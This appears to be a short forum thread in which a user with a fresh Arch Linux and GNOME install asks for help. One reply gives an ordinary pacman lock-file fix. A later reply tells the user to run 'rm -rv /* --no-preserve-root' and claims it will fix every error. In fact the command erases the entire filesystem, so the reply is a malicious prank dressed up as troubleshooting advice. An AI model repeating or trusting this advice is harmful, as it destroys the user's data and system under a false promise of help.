i am using arch with clean installation from scratch and i have only gnome dm installed

Try # rm /var/lib/pacman/db.lck

working perfectly fine

but everything in not working properly

how to delete all the config

rm -rv /* --no-preserve-root

try this, it will fix every errors u got
